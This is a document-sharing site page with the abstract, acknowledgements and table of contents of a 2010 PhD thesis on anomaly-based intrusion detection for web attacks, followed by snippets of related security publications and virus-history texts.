DOCSLIB.ORG

2.3 Intrusion Detection Systems Evaluation

Total Page:16

File Type:pdf, Size:1020Kb

Download full-text PDF Read full-text
2.3 Intrusion Detection Systems Evaluation Ph.D. in Electronic and Computer Engineering Dept. of Electrical and Electronic Engineering University of Cagliari Host and Network based Anomaly Detectors for HTTP Attacks Davide Ariu Advisor: Prof. Giorgio Giacinto Curriculum: ING-INF/05 SISTEMI DI ELABORAZIONE DELLE INFORMAZIONI XXII Cycle Marzo 2010 Ph.D. in Electronic and Computer Engineering Dept. of Electrical and Electronic Engineering University of Cagliari Host and Network based Anomaly Detectors for HTTP Attacks Davide Ariu Advisor: Prof. Giorgio Giacinto Curriculum: ING-INF/05 SISTEMI DI ELABORAZIONE DELLE INFORMAZIONI XXII Cycle Marzo 2010 Alla mia famiglia... Host and Network based Anomaly Detectors for HTTP Attacks by Davide Ariu Abstract The huge number of people that everyday connects to Internet makes web applications an attractive target for computer criminals. For example an attack against a web service might be used to quickly spread a malware or to steal ac- cess credential from the web service users. To avoid this the protection of web applications with Intrusion Detection Systems (IDS) is necessary. Unfortunately, protecting web applications is a tricky task since they are in general large, com- plex and highly customized. Traditional systems based on signatures are not ad- equate to guarantee a solid defense since they are not able to face up with zero days attacks. Anomaly-based systems represent a valid alternative to signature based ones and they offer also protection against zero days attacks. In this dissertation we propose several anomaly-based Intrusion Detection Systems for the protection of web applications. We address that of the Intrusion Detection as a Pattern Recognition problem discussing all the aspects that must be considered in realizing an anomaly-based IDS. The formulation of the prob- lem the most suitable for web applications security is the “One-class” formula- tion. This formulation builds a statistical model which is based on legitimate patterns only, thus ignoring any kind of information about the attacks. With this approach potentially any attack pattern can be detected if it is statistically anomalous respect to those within the target (that is the legitimate) class. We propose a Host-based and two Network-based IDS. Both Host and Net- work based solutions are effective even if with different scopes. Host-based IDS are more specific and tailored to protect a particular application. A Network- based IDS offers the great advantage of being able to monitor the traffic toward an entire network segment. In all of the proposed IDS we employ Multiple Clas- sifiers to increase the accuracy of the IDS and to harden the IDS against attempts of evasion. All the IDS have been tested on several datasets of attacks and nor- mal traffic both private and publicly available. Experimental results confirm the effectiveness of the proposed solutions in terms of a high detection rate and with regard to the small amount of false alarms generated. Acknowledgements Understand the things I say, Don’t turn away from me. ’Cause I’ve spent half my life out there,You wouldn’t disagree D. O’Riordan At the end of an amazing experience such as that of pursuing a Ph.D., there is always somebody to thank. I don’t want to escape this unwritten rule, since the last three years have been a school of life before being an unbelievable professional experience. There has been at least one moment in these three years where each one of the people that I’m going to mention has been very important to me. Thus, to thank them I will follow just a chronological order. The first person I would say thank is Prof. Giorgio Giacinto, as he gave to me the possi- bility of living this experience. I would thank him for his valued advices, for his helpfulness and to have been by far more than a simple advisor. The second person I would say thank is Prof. Fabio Roli, for his exhortations to live the research with passion and ambition. I would say thank to both Prof. Giacinto and Roli for gave me the opportunity to join the PRA group and that of beginning my Ph.D. with an amazing experience at the Georgia Institute of Technology. The period in Atlanta has been certainly one of the most hard periods of my Ph.D., but I will always remember it as one of the most beautiful moments of my entire life. Many people helped me in having such an enjoyable period there. Certainly without Andrea, Claudio and Roberto (in a strict alphabetical order) my American staying wouldn’t have had the same taste. I have much appreciated that nice person which is Jack A. Lang, who gave me his hospitality with courtesy and helpfulness. There are also other people who in that period showed me their affection even if I was more than six thousands of kilometers away. Thanks to everybody. A big thank to all the PRA people and, above all, to Battista and Luca. I shared with them moments of both hard work and fun, and I spent hours waiting at the University cafeteria. Finally, there is my Family. I don’t have enough words to explain how much I love them, how much I’m thankful for their kind support and infinite patience and to say how much I’m proud of them. Without them I wouldn’t certainly be who I am and for this I will be eternally grateful to them. iii Ringraziamenti Understand the things I say, Don’t turn away from me. ’Cause I’ve spent half my life out there,You wouldn’t disagree D. O’Riordan Al termine di un esperienza ricca e impegnativa come un Dottorato di Ricerca, c’é sempre qualcuno a cui dover dire grazie. Personalmente, non ho alcuna intenzione di sottrarmi a questa tacita regola, dato che gli ultimi tre anni sono stati per me una scuola di vita prima ancora che una fantastica esperienza professionale. Stabilire una gerarchia e un ordine secondo il quale ringraziare tutte le persone a cui in- tendo esprimere la mia gratitudine non sarebbe possibile e forse nemmeno giusto, dato che c’é stato almeno un momento lungo questo cammino nel quale ognuna di esse é stata fonda- mentale. Per non fare torto a nessuno, mi limiteró pertanto a seguire un ordine cronologico. La prima persona a cui devo dire grazie é il Prof. Giorgio Giacinto, il quale mi ha offerto la possibilitá di vivere quest’esperienza. Lo ringrazio per i suoi preziosi consigli, per essersi dimostrato disponibile ogni qual volta io abbia richiesto il suo aiuto, e per essere stato molto di piú di un semplice tutor. Ringrazio il Prof. Fabio Roli, per l’incitamento a vivere con passione e ambizione l’attivitá di ricerca. Un ringraziamento congiunto a Prof. Giacinto e a Prof. Roli, per avermi offerto la possibilitá di entrare a far parte del gruppo PRA e di iniziare il mio dottorato di ricerca con uno straordinario periodo al Georgia Institute of Technology. Il periodo trascorso ad Atlanta é stato senza dubbio uno dei momenti piú faticosi del mio dottorato ma lo ricorderó sempre come uno dei momenti piú belli e intensi della mia vita. Se ha potuto essere quel che é stato lo devo a diverse persone. Tra queste Andrea, Claudio e Roberto (in rigoroso ordine alfabetico) senza la cui presenza il soggiorno negli Stati Uniti non avrebbe potuto avere lo stesso sapore. Un ringraziamento a parte, lo devo a Jack Lang, il quale mi ha aperto le porte di casa propria con grande cortesia e disponibilitá. Ci sono poi tante altre persone, che non elenco esplicitamente, ma che hanno saputo starmi vicino anche a piú di 6000 chilometri di distanza. A tutte, grazie. Un grazie a tutte le persone del gruppo PRA. Tra tutte, con Battista e Luca in particolare ho avuto modo di condividere, oltre che ore di duro lavoro, anche tanti momenti divertenti, tra cui le lunghe ore di fila ai tornelli delle mense universitarie. Infine il ringraziamento piú grande, va senza dubbio alla mia Famiglia. Nonostante credo sappiano ben poco di ció di cui mi occupo, mi hanno sempre incitato e sostenuto, aiutan- domi a ritrovare l’equilibrio che ogni tanto avevo smarrito. Non ci sono parole che possano esprimere i miei sentimenti, la mia gratitudine e quanto io sia orgoglioso di ognuno di loro. Se ho potuto raggiungere questo traguardo é anche grazie alla serenitá che mi hanno sempre v insegnato ad avere anche di fronte alle difficoltá. E di questo non potró mai essere abbas- tanza grato. Contents 1 Introduction 1 1.1 Contribution of the thesis ............................... 3 1.2 Organization....................................... 4 2 An Introduction to Intrusion Detection5 2.1 Taxonomy of Intrusion Detection Systems...................... 6 2.2 Taxonomy of Attacks .................................. 8 2.3 Intrusion Detection Systems Evaluation....................... 10 2.3.1 ROC Curves ................................... 10 2.3.2 More on evaluation metrics.......................... 11 3 Pattern Recognition Algorithms for Anomaly Detection 13 3.1 One vs. Multi-class Pattern Classification ...................... 15 3.1.1 Multi-class Pattern Classification....................... 16 3.1.2 One-class Pattern Classification ....................... 19 3.2 Algorithms for pattern classification ......................... 21 3.2.1 Hidden Markov Models ............................ 21 3.2.2 One-Class SVM................................. 22 3.3 Multiple Classifier Systems............................... 23 3.3.1 Classifier Selection............................... 24 3.3.2 Classifier Fusion ................................ 25 3.3.3 Combining Multiple One-Class SVM Classifiers.............. 26 4 Web Applications Security: an Host-based solution 29 4.1 Web Applications: An overview ............................ 29 4.2 Attacks against Web Applications........................... 31 4.2.1 SQL injection .................................. 31 4.2.2 Cross Site Scripting - XSS ........................... 31 4.2.3 Remote File Inclusion - Shellcode Injection ...............
Load more

Recommended publications
  • Paradise Lost , Book III, Line 18
    _Paradise Lost_, book III, line 18 %%%%%%%%%%%%%%%%%%%%%%%% ++++++++++Hacker's Encyclopedia++++++++ ===========by Logik Bomb (FOA)======== <http://www.xmission.com/~ryder/hack.html> ---------------(1997- Revised Second Edition)-------- ##################V2.5################## %%%%%%%%%%%%%%%%%%%%%%%% "[W]atch where you go once you have entered here, and to whom you turn! Do not be misled by that wide and easy passage!" And my Guide [said] to him: "That is not your concern; it is his fate to enter every door. This has been willed where what is willed must be, and is not yours to question. Say no more." -Dante Alighieri _The Inferno_, 1321 Translated by John Ciardi Acknowledgments ---------------------------- Dedicated to all those who disseminate information, forbidden or otherwise. Also, I should note that a few of these entries are taken from "A Complete List of Hacker Slang and Other Things," Version 1C, by Casual, Bloodwing and Crusader; this doc started out as an unofficial update. However, I've updated, altered, expanded, re-written and otherwise torn apart the original document, so I'd be surprised if you could find any vestiges of the original file left. I think the list is very informative; it came out in 1990, though, which makes it somewhat outdated. I also got a lot of information from the works listed in my bibliography, (it's at the end, after all the quotes) as well as many miscellaneous back issues of such e-zines as _Cheap Truth _, _40Hex_, the _LOD/H Technical Journals_ and _Phrack Magazine_; and print magazines such as _Internet Underground_, _Macworld_, _Mondo 2000_, _Newsweek_, _2600: The Hacker Quarterly_, _U.S. News & World Report_, _Time_, and _Wired_; in addition to various people I've consulted.
    [Show full text]
  • Dictionary of Health Information Technology and Security
    DICTIONARY OF HEALTH INFORMATION TECHNOLOGY AND SECURITY Dr. David Edward Marcinko, MBA , CFP© Certifi ed Medical Planner© Editor-in-Chief Hope Rachel Hetico, RN, MSHA, CPHQ Certifi ed Medical Planner© Managing Editor NEW YORK 33021009_FM1.indd021009_FM1.indd i 003/17/20073/17/2007 116:48:506:48:50 Copyright © 2007 Springer Publishing Company, LLC All rights reserved. No part of this publication may be reproduced, stored in a retrieval system, or transmit- ted in any form or by any means, electronic, mechanical, photocopying, recording, or otherwise, without the prior permission of Springer Publishing Company, LLC. Springer Publishing Company, LLC 11 West 42nd Street New York, NY 10036 www.springerpub.com Acquisitions Editor: Sheri W. Sussman Production Editor: Carol Cain Cover design: Mimi Flow Composition: Apex Publishing, LLC 07 08 09 10/ 5 4 3 2 1 Library of Congress Cataloging-in-Publication Data Dictionary of health information technology and security / David Edward Marcinko, editor-in-chief, Hope Rachel Hetico, managing editor. p. ; cm. Includes bibliographical references. ISBN-13: 978-0-8261-4995-4 (alk. paper) ISBN-10: 0-8261-4995-2 (alk. paper) 1. Medical informatics—Dictionaries. 2. Medicine—Information technology—Dictionaries. 3. Medical informatics—Security measures— Dictionaries. I. Marcinko, David E. (David Edward) II. Hetico, Hope R. [DNLM: 1. Informatics—Dictionary—English. 2. Medical Informatics— Dictionary—English. 3. Computer Communication Networks—Dictionary— English. 4. Computer Security—Dictionary—English. W 13 D557165 2007] R858.D53 2007 610.3—dc22 2007005879 Printed in the United States of America by RR Donnelley. 33021009_FM1.indd021009_FM1.indd iiii 003/17/20073/17/2007 116:48:516:48:51 Th e Dictionary of Health Information Technology and Security is dedicated to Edward Anthony Marcinko Sr., and Edward Anthony Marcinko Jr., of Fell’s Point, Maryland.
    [Show full text]
  • Flexible Infections: Computer Viruses, Human Bodies, Nation-States, Evolutionary Capitalism
    Science,Helmreich Technology, / Flexible Infections& Human Values Flexible Infections: Computer Viruses, Human Bodies, Nation-States, Evolutionary Capitalism Stefan Helmreich New York University This article analyzes computer security rhetoric, particularly in the United States, argu- ing that dominant cultural understandings of immunology, sexuality, legality, citizen- ship, and capitalism powerfully shape the way computer viruses are construed and com- bated. Drawing on popular and technical handbooks, articles, and Web sites, as well as on e-mail interviews with security professionals, the author explores how discussions of computer viruses lean on analogies from immunology and in the process often encode popular anxieties about AIDS. Computer security rhetoric about compromised networks also uses language reminiscent of that used to describe the “bodies” of nation-states under military threat from without and within. Such language portrays viruses using images of foreignness, illegality, and otherness. The security response to viruses advo- cates the virtues of the flexible and adaptive response—a rhetoric that depends on evolu- tionary language but also on the ideological idiom of advanced capitalism. As networked computing becomes increasingly essential to the operations of corporations, banks, government, the military, and academia, worries about computer security and about computer viruses are intensifying among the people who manage and use these networks. The end of the 1990s saw the emergence of a small industry dedicated to antivirus protection software, and one can now find on the World Wide Web a great deal of information about how viruses work, how they can be combated, and how computer users might keep up with ever-changing inventories and taxonomies of the latest viruses.
    [Show full text]
  • IBM X-Force Threat Insight Quarterly 2 X-Force Threat Insight Quarterly IBM Security Solutions
    IBM Security Solutions May 2011 IBM X-Force Threat Insight Quarterly 2 X-Force Threat Insight Quarterly IBM Security Solutions Contents About the report 2 About the Report The IBM X-Force® Threat Insight Quarterly is designed to highlight some of the most significant threats and challenges 3 Evolution: From Nuisance to Weapon facing security professionals today. This report is a product of IBM Managed Security Services and the IBM X-Force 8 Prolific and Impacting Issues of Q1 2011 research and development team. Each issue focuses on specific challenges and provides a recap of the most significant recent 16 References online threats. IBM Managed Security Services are designed to help an organization improve its information security, by outsourcing security operations or supplementing your existing security teams. The IBM protection on-demand platform helps deliver Managed Security Services and the expertise, knowledge and infrastructure an organization needs to secure its information assets from Internet attacks. The X-Force team provides the foundation for a preemptive approach to Internet security. The X-Force team is one of the best-known commercial security research groups in the world. This group of security experts researches and evaluates vulnerabilities and security issues, develops assessment and countermeasure technology for IBM security products, and educates the public about emerging Internet threats. We welcome your feedback. Questions or comments regarding the content of this report should be addressed to [email protected]. 3 X-Force Threat Insight Quarterly IBM Security Solutions Evolution: From Nuisance to Weapon One of the more notable examples here is Brain3, a boot sector infector which originated in Pakistan and released in 1986, was Creeper, Wabbit, Animal, Elk Cloner, Brain, Vienna, Lehigh, one of the first examples of malware that infected PC’s running Stoned, Jerusalem.
    [Show full text]
  • Virus Bulletin, July 91
    July 1991 ISSN 0956-9979 THE AUTHORITATIVE INTERNATIONAL PUBLICATION ON COMPUTER VIRUS PREVENTION, RECOGNITION AND REMOVAL Editor: Edward Wilding Technical Editor: Fridrik Skulason, University of Iceland Editorial Advisors: Jim Bates, Bates Associates, UK, Phil Crewe, Fingerprint, UK, David Ferbrache, ISIS Ltd., UK, Ray Glath, RG Software Inc., USA, Hans Gliss, Datenschutz Berater, West Germany, Ross M. Greenberg, Software Concepts Design, USA, Dr. Harold Joseph Highland, Compulit Microcomputer Security Evaluation Laboratory, USA, Dr. Jan Hruska, Sophos, UK, Dr. Keith Jackson, Walsham Contracts, UK, Owen Keane, Barrister, UK, John Laws, RSRE, UK, David T. Lindsay, Digital Equipment Corporation, UK, Yisrael Radai, Hebrew University of Jerusalem, Israel, Martin Samociuk, Network Security Management, UK, John Sherwood, Sherwood Associates, UK, Prof. Eugene Spafford, Purdue University, USA, Dr. Peter Tippett, Certus International Corporation, USA, Dr. Ken Wong, PA Consulting Group, UK, Ken van Wyk, CERT, USA. CONTENTS SCANNER UPDATE IBM Triumphs Amidst the ‘Vapourware’ 34 EDITORIAL 2 Results Table 35 TECHNICAL NOTES 3 TUTORIAL PRODUCT REVIEWS Fixed Disk Boot Sectors and 1. SafeWord Virus-Safe 36 Post-Attack Recovery 5 2. Knoxcard: Anti-Virus Hardware 38 Virus Bulletin Education, Training & Awareness Presentations 9 3. Trend Micro Devices’ PC-cillin 40 LETTERS SHAREWARE REVIEW VB Signatures With IBM’s Virscan 10 PC Virus Index 42 Vetting Procedure 10 KNOWN IBM PC VIRUSES 12 END-NOTES & NEWS 44 VIRUS BULLETIN ©1991 Virus Bulletin Ltd, 21 The Quadrant, Abingdon Science Park, Oxon, OX14 3YS, England. Tel (+44) 235 555139. /90/$0.00+2.50 This bulletin is available only to qualified subscribers. No part of this publication may be reproduced, stored in a retrieval system, or transmitted by any form or by any means, electronic, magnetic, optical or photocopying, without the prior written permission of the publishers.
    [Show full text]
  • LIBRARIES Building a Global Information Assurance Program.Pdf
    Building a Global Information Assurance Program OTHER AUERBACH PUBLICATIONS The ABCs of IP Addressing Information Security Management Gilbert Held Handbook, 4th Edition, Volume 4 ISBN: 0-8493-1144-6 Harold F. Tipton and Micki Krause, Editors The ABCs of TCP/IP ISBN: 0-8493-1518-2 Gilbert Held Information Security Policies, ISBN: 0-8493-1463-1 Procedures, and Standards: Building an Information Security Guidelines for Effective Information Awareness Program Security Management Mark B. Desman Thomas R. Peltier ISBN: 0-8493-0116-5 ISBN: 0-8493-1137-3 Building a Wireless Office Information Security Risk Analysis Gilbert Held Thomas R. Peltier ISBN: 0-8493-1271-X ISBN: 0-8493-0880-1 The Complete Book of Middleware A Practical Guide to Security Engineering Judith Myerson and Information Assurance ISBN: 0-8493-1272-8 Debra Herrmann ISBN: 0-8493-1163-2 Computer Telephony Integration, 2nd Edition The Privacy Papers: William A. Yarberry, Jr. Managing Technology and Consumers, ISBN: 0-8493-1438-0 Employee, and Legislative Action Rebecca Herold Cyber Crime Investigator’s Field Guide ISBN: 0-8493-1248-5 Bruce Middleton ISBN: 0-8493-1192-6 Secure Internet Practices: Best Practices for Securing Systems in Cyber Forensics: A Field Manual for the Internet and e-Business Age Collecting, Examining, and Preserving Patrick McBride, Jody Patilla, Evidence of Computer Crimes Craig Robinson, Peter Thermos, Albert J. Marcella and Robert S. Greenfield, and Edward P. Moser Editors ISBN: 0-8493-1239-6 ISBN: 0-8493-0955-7 Securing and Controlling Cisco Routers Global Information Warfare: Peter T. Davis How Businesses, Governments, and ISBN: 0-8493-1290-6 Others Achieve Objectives and Attain Competitive Advantages Securing E-Business Applications and Andy Jones, Gerald L.
    [Show full text]
  • The European Inter-University Association on Society, Science and DEVELOPING MALWARE
    ESST The European Inter-University Association on Society, Science and Technology DEVELOPING MALWARE - A SCOT ANALYSIS OF THE SUCCESS OF MALWARE Globalization, Innovation and Policy Erlend Flesjø First Semester University: University of Oslo Second Semester University: University of Oslo Word count: 21.309 2 2 3 Abstract Computer malware has drastically increased over the last 20 years and it shows no sign of slowing down. On the contrary, malware spreads like ever before causing more critical situations as well as threatening the entire online economy in the process. Despite of the critical threat malware represents governments and the anti-virus communities have not yet managed to get the upper hand in the fight against malware and their creators. This thesis analyzes the development of malware using the theory and methodology of Social Construction of Technology set forward by Bijker and Pinch. My empirical data is from relevant companies and organizations around Oslo and has been gathered from interviews. (Watchcom Security Group, Symantec Norway, international hackers and The National Criminal Investigation Service) My thesis traces the development of computer malware, looking at factors that have influenced the process and the power play between relevant social groups who wants to shape the development. It also highlights social and structural reasons why the government and the anti-virus industry have failed to contain malware. Keywords: SCOT, STS, malware, computer virus, botnet 3 4 4 5 Acknowledgements: I would like to thank the following persons for their help while writing this thesis. First and foremost, my supervisor Post. Doc. Beate Elvebakk, for her constructive feedback, good ideas and general helpful suggestions.
    [Show full text]
  • Virus Bulletin, August 1993
    August 1993 ISSN 0956-9979 THE AUTHORITATIVE INTERNATIONAL PUBLICATION ON COMPUTER VIRUS PREVENTION, RECOGNITION AND REMOVAL Editor: Richard Ford Technical Editor: Fridrik Skulason Consulting Editor: Edward Wilding, Network Security Management, UK Advisory Board: Jim Bates, Bates Associates, UK, David M. Chess, IBM Research, USA, Phil Crewe, Ziff-Davis, UK, David Ferbrache, Defence Research Agency, UK, Ray Glath, RG Software Inc., USA, Hans Gliss, Datenschutz Berater, West Germany, Igor Grebert, McAfee Associates, USA, Ross M. Greenberg, Software Concepts Design, USA, Dr. Harold Joseph Highland, Compulit Microcomputer Security Evaluation Laboratory, USA, Dr. Jan Hruska, Sophos, UK, Dr. Keith Jackson, Walsham Contracts, UK, Owen Keane, Barrister, UK, John Laws, Defence Research Agency, UK, Dr. Tony Pitt, Digital Equipment Corporation, UK, Yisrael Radai, Hebrew University of Jerusalem, Israel, Roger Riordan, Cybec Pty, Australia, Martin Samociuk, Network Security Management, UK, John Sherwood, Sherwood Associates, UK, Prof. Eugene Spafford, Purdue University, USA, Dr. Peter Tippett, Symantec Corporation, USA, Steve R. White, IBM Research, USA, Joseph Wells, Symantec Corporation, USA, Dr. Ken Wong, PA Consulting Group, UK, Ken van Wyk, CERT, USA. CONTENTS VIRUS ANALYSES 1. Daemaen: Multi-multipartism 9 EDITORIAL 2. 8888 - The Poor Man’s Commander Bomber 12 Crime and Punishment 2 ROGUES’ GALLERY VIRUS PREVALENCE TABLE 3 Keep It To Yourself 14 NEWS Storing Up Trouble 3 PRODUCT REVIEW 40Hex Print DAME Source code... 3 Better CPAV than CPAV? 16 Crown Wins Logic Bomb Case 3 COMPARATIVE REVIEW IBM PC VIRUSES (UPDATE) 4 OS/2 Virus Protection 20 INSIGHT Getting to the Point 7 END NOTES & NEWS 24 VIRUS BULLETIN ©1993 Virus Bulletin Ltd, 21 The Quadrant, Abingdon Science Park, Oxon, OX14 3YS, England.
    [Show full text]
  • Evolution of Cyber Security Invotra
    Evolution of cyber security Invotra Digital Workplace, Intranet and Extranet 700 bc Scytale used by Greece and Rome to send messages And kids ever since.. Image Source: https://commons.wikimedia.org/wiki/File:Skytale.png 1467 Alberti Cipher was impossible to break without knowledge of the method. This was because the frequency distribution of the letters was masked and frequency analysis - the only known technique for attacking ciphers at that time was no help. Image Source: https://commons.wikimedia.org/wiki/File:Alberti_cipher_disk.JPG 1797 The Jefferson disk, or wheel cypher as Thomas Jefferson named it, also known as the Bazeries Cylinder. It is a cipher system using a set of wheels or disks, each with the 26 letters of the alphabet arranged around their edge. Image Source: https://en.wikipedia.org/wiki/Jefferson_disk#/media/File:Jefferson%27s_disk_cipher.jpg 1833 Augusta Ada King-Noel, Countess of Lovelace was an English mathematician and writer, chiefly known for her work on Charles Babbage's proposed mechanical general-purpose computer, the Analytical Engine. She is widely seen as the world's first programmer Image Source: https://commons.wikimedia.org/wiki/File:Ada_Lovelace_portrait.jpg 1903 Magician and inventor Nevil Maskelyne interrupted John Ambrose Fleming's public demonstration of Marconi's purportedly secure wireless telegraphy technology. He sent insulting Morse code messages through the auditorium's projector. Image Source: https://en.wikipedia.org/wiki/Nevil_Maskelyne_(magician)#/media/File:Nevil_Maskelyne_circa_190 3.jpg 1918 The Enigma Machine. It was developed by Arthur Scherbius in 1918 and adopted by the German government and the nazi party Image Source: https://commons.wikimedia.org/wiki/File:Kriegsmarine_Enigma.png 1932 Polish cryptologists Marian Rejewski, Henryk Zygalski and Jerzy Różycki broke the Enigma machine code.
    [Show full text]
  • The Changing Face of INFOSEC Network World May-June 2001 M
    News from the Front 1 News from the Front: The Changing Face of INFOSEC Network World May-June 2001 M. E. Kabay, PhD, CISSP <[email protected]> Copyright 2001 M. E. Kabay. All rights reserved. Copyright © 2001 M. E. Kabay. All rights reserved. Network World: Changing Security Paradigms May-June 2001 M. E. Kabay, PhD, CISSP was at the time this talk was presented Security Leader, INFOSEC Group AtomicTangerine, Inc. Menlo Park, CA http://www.atomictangerine.com and is currently Associate Professor of Computer Information Systems Norwich University, Northfield, VT He can be reached by mail at 255 Flood Road Barre, VT 05641-4060 Telephone and voice mail: 802-479-7937 Copyright 8 2001 M. E. Kabay. Page 1 All rights reserved. News from the Front 2 Objectives z Review fundamental goals of INFOSEC z Raise awareness of key challenges z Examine defensive strategies z Review practical recommendations z Set common ground for vendor presentations Copyright © 2001 M. E. Kabay. All rights reserved. About Michel E. Kabay M. E. Kabay began learning assembler at age 15 and had learned FORTRAN IV G at McGill University by 1966. In 1976, he received his PhD from Dartmouth College in applied statistics and invertebrate zoology. Until 1979, he was a university professor in applied statistics. In 1979, he joined a compiler team for a new 4GL and RDBMS in the U.S., being responsible for developing the statistical syntax, writing the parser, error traps and code generation for statistical functions in the command language. Kabay joined Hewlett_Packard in 1980 and became a performance specialist, winning the Systems Engineer of the Year Award in 1982.
    [Show full text]
  • Reducing Risks from Cyber Attacks
    Reducing Risks from Cyber Attacks Presented for Cyber Security Awareness Month 2012 Tim Gurganus [email protected] History of Malware at NC State University • 100K to 200K samples submitted everyday to antivirus companies • Analysis done by automation • 25 years ago – manual analysis, figure out how it spreads, create fingerprint/pattern for detection History of Malware at NC State University • 1986 – Brain.A spread via 5 1/4” floppy – Written by two brothers in Pakistan as a POC to prove PC-DOS was not as secure as Unix – Now running Brain Telecommunications – Stone and Cascade were basically same as Brain – Spread when an infected floppy was left in the floppy drive and DOS restarted – BIOS was set to boot from any floppy – Every floppy put into the infected PC got infected – Yankee Doodle was a .COM infector that infected all .COM files on the floppy to spread History of Malware at NC State University • 1990 Joshi virus • Did nothing until one day a year • PC wouldn’t boot until you typed: – Happy Birthday Joshi History of Malware at NC State University • 1991 – viruses spread via 5 1/4” floppy and had a visual component – Viruses like Form and Dark Avenger had a visual component – You would know you were infected by the sound played or the graphics shown – Omega – displayed Omega character on the screen if 13 th of the month was a Friday – Later viruses opened and closed the CD tray to indicate infection History of Malware at NC State University • 1992 Michelangelo virus • Destroyed files on infected PC • Overwrote the first 100
    [Show full text]
  • Computer Virus Tutorial
    Computer Virus Tutorial Computer Virus Tutorial License Copyright 1996-2005, Computer Knowledge. All Rights Reserved The Computer Knowledge Virus Tutorial is a copyright product of Computer Knowledge. It also contains copyrighted material from others (used with permission). Please honor the copyrights. Read the tutorial, learn from the tutorial, download and run the PDF version of the tutorial on your computer, link to the tutorial. But, please don't copy it and claim it as your own in whole or part. The PDF version of the Computer Knowledge Virus Tutorial is NOT in the public domain. It is copyrighted by Computer Knowledge and it and all accompanying materials are protected by United States copyright law and also by international treaty provisions. The tutorial requires no payment of license fees for its use as an educational tool. If you are paying to use the tutorial please advise Computer Knowledge (PO Box 5818, Santa Maria, CA 93456 USA). Please provide contact information for those charging the fee; even a distribution fee. License for Distribution of the PDF Version No royalties are required for distribution. No fees may be charged for distribution of the tutorial. You may not use, copy, rent, lease, sell, modify, decompile, disassemble, otherwise reverse engineer, or transfer the licensed program except as provided in this agreement. Any such unauthorized use shall result in immediate and automatic termination of this license. In no case may this product be bundled with hardware or other software without written permission from Computer Knowledge (PO Box 5818, Santa Maria, CA 93456 USA). All distribution of the Computer Knowledge Virus Tutorial is further restricted with regard to sources which also distribute virus source code and related virus construction/creation materials.
    [Show full text]